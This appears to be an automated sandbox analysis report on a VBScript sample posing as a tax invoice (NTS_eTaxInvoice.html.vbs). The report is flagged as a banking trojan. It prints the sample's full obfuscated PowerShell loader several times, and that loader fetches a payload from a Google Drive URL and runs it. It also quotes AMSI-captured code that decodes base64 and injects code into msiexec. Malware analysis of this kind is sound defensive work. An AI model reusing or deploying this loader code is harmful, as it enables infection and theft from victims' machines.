              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.5:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.5:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49734 version: TLS 1.2

              E-Banking Fraud

              Source: Yara matchFile source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1632, type: MEMORYSTR

              System Summary

              Source: amsi32_1812.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1788, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: NTS_eTaxInvoice.html.vbsStatic file information: Suspicious name
              Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable 
(Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF84860B2762_2_00007FF84860B276
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF84860C0222_2_00007FF84860C022
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF8486DA09A2_2_00007FF8486DA09A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_029FF3204_2_029FF320
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_029FFBF04_2_029FFBF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_029FEFD84_2_029FEFD8
              Source: NTS_eTaxInvoice.html.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7485
              Source: unknownProcess created: Commandline size = 7485
              Source: amsi32_1812.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1788, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/7@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Forsvarsundtagelsen.Non
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5dhknl5.0j1.ps1
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1788
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1812
              Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 
'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable 
(Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32}\InprocServer32 source: powershell.exe, 00000004.00000002.2767069878.0000000006C33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.2767069878.0000000006C33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000004.00000002.2777282940.0000000007DC0000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Inter", "0")
              Source: Yara match File source: 00000004.00000002.2778451648.00000000088EE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2778199563.0000000008060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2759953043.0000000005324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Tysklandskortene)$global:hyperdelicacy = [System.Text.Encoding]::ASCII.GetString($Afvises)$global:Esthesiography=$hyperdelicacy.substring($hanerne,$Whitewashes)<#Effulgent Precalcula
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Dilemmaet $uddrivning $Noget218), (Sumass @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:binrformens = [AppDomain]::CurrentDomain.GetAssemblies()$global:O
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Noninhabitancies)), $Frerhusene).DefineDynamicModule($Erythrodextrin, $false).DefineType($Slutakkorder, $grnsetilfldes, [System.Multic
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Tysklandskortene)$global:hyperdelicacy = [System.Text.Encoding]::ASCII.GetString($Afvises)$global:Esthesiography=$hyperdelicacy.substring($hanerne,$Whitewashes)<#Effulgent Precalcula
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 
'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF84860CFE8 push esp; retf 2_2_00007FF84860CFE9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF8486000BD pushad ; iretd 2_2_00007FF8486000C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_029F8D2F push 2B6C708Bh; retf 4_2_029F94F5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_029F8D70 push 2B6C708Bh; retf 4_2_029F94F5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0878181D push ebx; retf 4_2_08781823
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_087848A9 pushfd ; iretd 4_2_087848BC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_087829F5 push ebx; ret 4_2_08782A53
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08782A05 push ebx; ret 4_2_08782A53
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08782CF1 push ebx; iretd 4_2_08782CF2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08780F4D push esp; ret 4_2_08780F4E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08783243 push ebx; iretd 4_2_0878325E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0878423E pushfd ; iretd 4_2_08784240
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08781229 push ebx; iretd 4_2_0878122A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08780379 push ebx; retf 4_2_0878037A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0878439E push edx; iretd 4_2_087843A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08783471 push ebx; iretd 4_2_08783472
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0878242E push ss; ret 4_2_0878242F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0878054D push ebx; retf 4_2_0878054E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_087805FA push edx; retf 4_2_087805FB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08780586 push es; iretd 4_2_08780587
